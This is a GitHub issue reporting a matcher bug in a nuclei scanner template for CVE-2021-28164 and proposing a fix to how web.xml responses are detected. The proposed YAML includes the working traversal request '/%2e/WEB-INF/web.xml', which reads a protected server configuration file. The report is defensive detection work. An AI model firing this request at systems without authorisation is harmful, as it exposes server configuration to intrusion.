### ISSUE TITLE
[Bug] CVE-2021-28164.yaml - Match Problem

### ISSUE THREAD

**Issue by bernardofsr** [projectdiscovery/nuclei-templates#2144]
**Describe the bug**
This bug has to do with how the text in the body is detected.
You can see that the match is done with: ```<web-app>``` and ```java.sun.com``` 

However, several *web.xml* files do not start with ```<web-app>``` but rather with ```<web-app version="2.4" xsi:schemaLocation="http://java.sun.com/xml/ns/ j2ee http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd">
</web-app>``` for example, which will cause the confirmation to fail, since the ```<web-app>``` doesn't exist. 

**Solution**
Replace the ```<web-app>``` with ```</web-app>```, this second will always be the same. 

**With Alterations**
```
requests:
  - method: GET
    path:
      - "{{BaseURL}}/%2e/WEB-INF/web.xml"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - "</web-app>"
          - "java.sun.com"
        part: body
        condition: and

      - type: word
        part: header
        words:
          - "application/xml"
```

*Link to template: https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-28164.yaml*
